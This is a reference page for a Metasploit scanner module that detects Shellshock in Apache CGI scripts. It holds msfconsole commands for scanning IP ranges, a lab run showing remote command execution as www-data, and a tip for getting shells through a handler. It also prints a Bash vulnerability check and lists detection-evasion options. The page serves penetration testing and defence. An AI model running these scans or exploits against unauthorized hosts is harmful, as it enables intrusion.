Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner - Metasploit
This page contains detailed information about how to use the auxiliary/scanner/http/apache_mod_cgi_bash_env metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
Module: auxiliary/scanner/http/apache_mod_cgi_bash_env
Source code: modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb
Disclosure date: 2014-09-24
Last modification time: 2018-11-16 12:18:28 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2014-6271, CVE-2014-6278
This module is also known as Shellshock.
This module scans for the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets CGI scripts in the Apache web server by setting the HTTP_USER_AGENT environment variable to a malicious function definition. PROTIP: Use exploit/multi/handler with a PAYLOAD appropriate to your CMD, set ExitOnSession false, run -j, and then run this module to create sessions on vulnerable hosts. Note that this is not the recommended method for obtaining shells. If you require sessions, please use the apache_mod_cgi_bash_env_exec exploit module instead.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
This module is a scanner module, and is capable of testing against multiple hosts.
msf > use auxiliary/scanner/http/apache_mod_cgi_bash_env
msf auxiliary(apache_mod_cgi_bash_env) > show options
... show and set options ...
msf auxiliary(apache_mod_cgi_bash_env) > set RHOSTS ip-range
msf auxiliary(apache_mod_cgi_bash_env) > exploit
Other examples of setting the RHOSTS option:
Example 1:
msf auxiliary(apache_mod_cgi_bash_env) > set RHOSTS 192.168.1.3-192.168.1.200
Example 2:
msf auxiliary(apache_mod_cgi_bash_env) > set RHOSTS 192.168.1.1/24
Example 3:
msf auxiliary(apache_mod_cgi_bash_env) > set RHOSTS file:/tmp/ip_list.txt
Required Options
RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
TARGETURI: Path to CGI script
Knowledge Base
Vulnerable Application
This module scans for the Shellshock vulnerability, a flaw in how the Bash shell handles external
environment variables. This module targets CGI scripts in the Apache web server by setting
the HTTP_USER_AGENT
environment variable to a malicious function definition.
Creating a Vulnerable Environment
To setup an Environment that the scanner can be run against, follow the below steps to install a vulnerable OS and Apache version.
To ensure that you have a vulnerable version of bash:
- Install Ubuntu 12.04.5 LTS
- Log into console
- Confirm the host is vulnerable (see next section)
Also install Apache2 from the apt repository with the following command
sudo apt-get install apache2
Enable cgi-mod in apache with the following command
sudo ln -s /etc/apache2/mods-available/cgi.load /etc/apache2/mods-enabled/cgi.load
Restart the apache service with the following command
sudo service apache2 reload
In your favorite text editor create a file (as root) in
/usr/lib/cgi-bin
calledtest.sh
with the following contents:#!/bin/bash printf "Content-type: text/html\n\n" printf "Test!\n"
Set the file to be executable with the following command
sudo chmod +x /usr/lib/cgi-bin/test.sh
To check if a host is vulnerable to the attack
Run (on the host)
env 'x=() { :;}; echo vulnerable' 'BASH_FUNC_x()=() { :;}; echo vulnerable' bash -c "echo test"
The shell will return the below text if the environment is vulnerable
vulnerable bash: BASH_FUNC_x(): line 0: syntax error near unexpected token `)' bash: BASH_FUNC_x(): line 0: `BASH_FUNC_x() () { :;}; echo vulnerable' bash: error importing function definition for `BASH_FUNC_x' test
Verification Steps
- Do: run
msfconsole
- Do: use
auxiliary/scanner/http/apache_mod_cgi_bash_env
- Do: set
RHOSTS [IP]
- Do: set
TARGETURI [URI]
- Do:
run
Options
CMD
This is the command that will be run by the scanner. The default setting is /usr/bin/id
.
CVE
This is the CVE that will be used to exploit the vulnerability.
The default setting is CVE-2014-6271
but valid options are CVE-2014-6271
or CVE-2014-6278
.
HEADER
This is the user agent string that is sent when the module is run. The default setting is User-Agent
.
METHOD
This is HTTP method used by the module. The default setting is GET
.
Scenarios
Ubuntu 12.04.5 LTS on Apache 2.2.22
msf5 > use auxiliary/scanner/http/apache_mod_cgi_bash_env
msf5 auxiliary(scanner/http/apache_mod_cgi_bash_env) > set RHOSTS 172.16.131.134
RHOSTS => 172.16.131.134
msf5 auxiliary(scanner/http/apache_mod_cgi_bash_env) > set TARGETURI /cgi-bin/test.sh
TARGETURI => /cgi-bin/test.sh
msf5 auxiliary(scanner/http/apache_mod_cgi_bash_env) > exploit
[+] uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Go back to menu.
Msfconsole Usage
Here is how the scanner/http/apache_mod_cgi_bash_env auxiliary module looks in the msfconsole:
msf6 > use auxiliary/scanner/http/apache_mod_cgi_bash_env
msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > show info
Name: Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
Module: auxiliary/scanner/http/apache_mod_cgi_bash_env
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2014-09-24
Provided by:
Stephane Chazelas
wvu <[email protected]>
lcamtuf
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
CMD /usr/bin/id yes Command to run (absolute paths required)
CVE CVE-2014-6271 yes CVE to check/exploit (Accepted: CVE-2014-6271, CVE-2014-6278)
HEADER User-Agent yes HTTP header to use
METHOD GET yes HTTP method to use
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI yes Path to CGI script
THREADS 1 yes The number of concurrent threads (max one per host)
VHOST no HTTP server virtual host
Description:
This module scans for the Shellshock vulnerability, a flaw in how
the Bash shell handles external environment variables. This module
targets CGI scripts in the Apache web server by setting the
HTTP_USER_AGENT environment variable to a malicious function
definition. PROTIP: Use exploit/multi/handler with a PAYLOAD
appropriate to your CMD, set ExitOnSession false, run -j, and then
run this module to create sessions on vulnerable hosts. Note that
this is not the recommended method for obtaining shells. If you
require sessions, please use the apache_mod_cgi_bash_env_exec
exploit module instead.
References:
https://nvd.nist.gov/vuln/detail/CVE-2014-6271
https://nvd.nist.gov/vuln/detail/CVE-2014-6278
OSVDB (112004)
https://www.exploit-db.com/exploits/34765
https://access.redhat.com/articles/1200223
https://seclists.org/oss-sec/2014/q3/649
Also known as:
Shellshock
Module Options
This is a complete list of options available in the scanner/http/apache_mod_cgi_bash_env auxiliary module:
msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > show options
Module options (auxiliary/scanner/http/apache_mod_cgi_bash_env):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD /usr/bin/id yes Command to run (absolute paths required)
CVE CVE-2014-6271 yes CVE to check/exploit (Accepted: CVE-2014-6271, CVE-2014-6278)
HEADER User-Agent yes HTTP header to use
METHOD GET yes HTTP method to use
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI yes Path to CGI script
THREADS 1 yes The number of concurrent threads (max one per host)
VHOST no HTTP server virtual host
Advanced Options
Here is a complete list of advanced options supported by the scanner/http/apache_mod_cgi_bash_env auxiliary module:
msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > show advanced
Module advanced options (auxiliary/scanner/http/apache_mod_cgi_bash_env):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN WORKSTATION yes The domain to use for Windows authentication
DigestAuthIIS true no Conform to IIS, should work for most servers. Only set to false for non-IIS servers
FingerprintCheck true no Conduct a pre-exploit fingerprint verification
HttpClientTimeout no HTTP connection and receive timeout
HttpPassword no The HTTP password to specify for authentication
HttpRawHeaders no Path to ERB-templatized raw headers to append to existing headers
HttpTrace false no Show the raw HTTP requests and responses
HttpTraceColors red/blu no HTTP request and response colors for HttpTrace (unset to disable)
HttpTraceHeadersOnly false no Show HTTP headers only in HttpTrace
HttpUsername no The HTTP username to specify for authentication
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
ShowProgress true yes Display progress messages during a scan
ShowProgressPercent 10 yes The interval in percent that progress should be shown
UserAgent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) no The User-Agent header to use for all requests
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the scanner/http/apache_mod_cgi_bash_env module can do:
msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > show actions
Auxiliary actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the scanner/http/apache_mod_cgi_bash_env auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
HTTP::header_folding false no Enable folding of HTTP headers
HTTP::method_random_case false no Use random casing for the HTTP method
HTTP::method_random_invalid false no Use a random invalid, HTTP method for request
HTTP::method_random_valid false no Use a random, but valid, HTTP method for request
HTTP::pad_fake_headers false no Insert random, fake headers into the HTTP request
HTTP::pad_fake_headers_count 0 no How many fake headers to insert into the HTTP request
HTTP::pad_get_params false no Insert random, fake query string variables into the request
HTTP::pad_get_params_count 16 no How many fake query string variables to insert into the request
HTTP::pad_method_uri_count 1 no How many whitespace characters to use between the method and uri
HTTP::pad_method_uri_type space no What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
HTTP::pad_post_params false no Insert random, fake post variables into the request
HTTP::pad_post_params_count 16 no How many fake post variables to insert into the request
HTTP::pad_uri_version_count 1 no How many whitespace characters to use between the uri and version
HTTP::pad_uri_version_type space no What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
HTTP::uri_dir_fake_relative false no Insert fake relative directories into the uri
HTTP::uri_dir_self_reference false no Insert self-referential directories into the uri
HTTP::uri_encode_mode hex-normal no Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
HTTP::uri_fake_end false no Add a fake end of URI (eg: /%20HTTP/1.0/../../)
HTTP::uri_fake_params_start false no Add a fake start of params to the URI (eg: /%3fa=b/../)
HTTP::uri_full_url false no Use the full URL for all HTTP requests
HTTP::uri_use_backslashes false no Use back slashes instead of forward slashes in the uri
HTTP::version_random_invalid false no Use a random invalid, HTTP version for request
HTTP::version_random_valid false no Use a random, but valid, HTTP version for request
Go back to menu.
Related Pull Requests
- #10973 Merged Pull Request: Rework DisclosureDate check in msftidy, including ISO 8601 support
- #10750 Merged Pull Request: Fix formatting and convert a missed AKA reference
- #10649 Merged Pull Request: Fix http://seclists.org links to https://
- #10570 Merged Pull Request: AKA Metadata Refactor
- #8716 Merged Pull Request: Print_Status -> Print_Good (And OCD bits 'n bobs)
- #8629 Merged Pull Request: add 'Also known as', AKA 'AKA', to module references
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #6812 Merged Pull Request: Resolve #6807, remove all OSVDB references.
- #6655 Merged Pull Request: use MetasploitModule as a class name
- #6648 Merged Pull Request: Change metasploit class names
- #6526 Merged Pull Request: Peers for the peer god
- #6298 Merged Pull Request: Update Shellshock modules, add Advantech coverage
- #3931 Merged Pull Request: Add CVE-2014-6278 support for evolved Bash bug
- #3917 Merged Pull Request: Update title of bash module to reflect scanner status
- #3912 Merged Pull Request: Fix bad header error from pure Bash CGI script
- #3902 Merged Pull Request: Add variable HTTP header for apache_mod_cgi_bash_env
- #3897 Merged Pull Request: Improve check for BASH HTTP modules
References
- CVE-2014-6271
- CVE-2014-6278
- OSVDB (112004)
- EDB-34765
- https://access.redhat.com/articles/1200223
- https://seclists.org/oss-sec/2014/q3/649
See Also
Check also the following modules related to this module:
- exploit/linux/http/advantech_switch_bash_env_exec
- exploit/multi/http/apache_mod_cgi_bash_env_exec
- exploit/unix/dhcp/bash_environment
- exploit/multi/http/cups_bash_env_exec
- auxiliary/server/dhclient_bash_env
- exploit/linux/http/ipfire_bashbug_exec
- exploit/multi/ftp/pureftpd_bash_env_exec
- exploit/unix/smtp/qmail_bash_env_exec
- exploit/osx/local/vmware_bash_function_root
- auxiliary/scanner/http/apache_activemq_source_disclosure
- auxiliary/scanner/http/apache_activemq_traversal
- auxiliary/scanner/http/apache_flink_jobmanager_traversal
- auxiliary/scanner/http/apache_normalize_path
- auxiliary/scanner/http/apache_optionsbleed
- auxiliary/scanner/http/apache_userdir_enum
- auxiliary/scanner/ssh/apache_karaf_command_execution
- auxiliary/dos/http/apache_commons_fileupload_dos
- auxiliary/dos/http/apache_mod_isapi
- auxiliary/dos/http/apache_range_dos
- auxiliary/dos/http/apache_tomcat_transfer_encoding
- auxiliary/gather/apache_rave_creds
- auxiliary/gather/cve_2021_27850_apache_tapestry_hmac_key
- auxiliary/scanner/printer/printer_env_vars
- post/multi/gather/env
- post/windows/gather/enum_powershell_env
- auxiliary/scanner/http/mod_negotiation_brute
- auxiliary/scanner/http/mod_negotiation_scanner
- auxiliary/scanner/http/wp_modern_events_calendar_sqli
- auxiliary/scanner/http/cgit_traversal
- auxiliary/scanner/http/dlink_dir_session_cgi_http_login
- auxiliary/scanner/http/smt_ipmi_cgi_scanner
Related Nessus plugins:
- Solaris 10 (x86) : 126547-10 (deprecated)
- Solaris 10 (sparc) : 126546-10 (deprecated)
- Bash Remote Code Execution (Shellshock)
- Debian DSA-3032-1 : bash - security update
- RHEL 5 / 6 / 7 : bash (RHSA-2014:1293) (Shellshock)
- GNU Bash Environment Variable Handling Code Injection (Shellshock)
- Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / current : bash (SSA:2014-267-01) (Shellshock)
- CentOS 5 / 6 / 7 : bash (CESA-2014:1293) (Shellshock)
- FreeBSD : bash -- remote code execution vulnerability (71ad81da-4414-11e4-a33e-3c970e169bc2) (Shellshock)
- Mandriva Linux Security Advisory : bash (MDVSA-2014:186)
Authors
- Stephane Chazelas
- wvu
- lcamtuf
Version
This page has been produced using Metasploit Framework version 6.1.33-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.